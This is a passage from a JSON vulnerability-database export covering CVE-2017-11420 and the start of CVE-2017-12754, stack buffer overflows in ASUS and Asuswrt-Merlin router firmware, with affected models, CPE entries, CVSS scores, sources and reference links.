"model": "rt-n300",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt ac1200g",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt ac1200gu",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt ac1900p",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt n12+ pro",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac1200",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac51u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac52u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac53",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac55u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac56u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac58u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac66u b1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac68p",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12+",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12d1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12hp",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n300",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1900p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac58u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac56u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac55u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac52u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac51u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1200gu",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1200g",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac1200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac53",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12d1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12+",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt n12+ pro",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3479"
},
{
"model": "rt ac1200g",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3167"
},
{
"model": "rt-n12d1",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n12\\+",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n12hp",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.2943"
},
{
"model": "rt-ac53",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9883"
},
{
"model": "rt n12\\+ pro",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac1200",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n300",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-754"
},
{
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
}
]
},
"cve": "CVE-2017-11420",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2017-11420",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-24400",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-101841",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-11420",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-11420",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-11420",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2017-24400",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-754",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-101841",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"db": "VULHUB",
"id": "VHN-101841"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-754"
},
{
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in ASUS_Discovery.c in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code via long device information that is mishandled during a strcat to a device list. ASUSRT-AC5300 is the RT series router product of ASUS. Asuswrt-Merlin is the firmware running in it. The following products are affected: ASUS RT-AC5300; RT_AC1900P; RT-AC68U; RT-AC68P; RT-AC88U; AC51U; RT-N18U; RT-N66U; RT-N56U; RT-AC3200; RT-AC3100; RT_AC1200GU; RT_AC1200G; RT_N12+_PRO; RT-N16; RT-N300",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11420"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"db": "VULHUB",
"id": "VHN-101841"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2017/07/13/1",
"trust": 3.1
},
{
"db": "NVD",
"id": "CVE-2017-11420",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-754",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-24400",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-101841",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"db": "VULHUB",
"id": "VHN-101841"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-754"
},
{
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"id": "VAR-201707-0535",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"db": "VULHUB",
"id": "VHN-101841"
}
],
"trust": 1.342782942
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-24400"
}
]
},
"last_update_date": "2025-04-20T23:27:22.844000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://asuswrt.lostrealm.ca/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-101841"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://www.openwall.com/lists/oss-security/2017/07/13/1"
},
{
"trust": 1.1,
"url": "https://asuswrt.lostrealm.ca/changelog"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11420"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-11420"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"db": "VULHUB",
"id": "VHN-101841"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-754"
},
{
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"db": "VULHUB",
"id": "VHN-101841"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-754"
},
{
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"date": "2017-07-18T00:00:00",
"db": "VULHUB",
"id": "VHN-101841"
},
{
"date": "2017-08-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"date": "2017-07-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-754"
},
{
"date": "2017-07-18T05:29:00.470000",
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-24400"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULHUB",
"id": "VHN-101841"
},
{
"date": "2017-08-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005985"
},
{
"date": "2017-07-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-754"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-11420"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-754"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware network map ASUS_Discovery.c Vulnerable to stack-based buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005985"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-754"
}
],
"trust": 0.6
}
}
VAR-201708-1179
Vulnerability from variot - Updated: 2025-04-20 23:23Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1179",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-n66u",
"scope": null,
"trust": 1.2,
"vendor": "asus",
"version": null
},
{
"model": "asuswrt-merlin",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "380.67"
},
{
"model": "asuswrt-merlin",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1900p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac52u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac51u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac1200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12d1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12+",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "asuswrt-merlin \u003c=380.67 0rt-ac5300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac55u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac56u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac58u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "asuswrt-merlin",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt",
"version": "380.67_0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-32450"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-443"
},
{
"db": "NVD",
"id": "CVE-2017-12754"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:asuswrt-merlin",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-007274"
}
]
},
"cve": "CVE-2017-12754",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
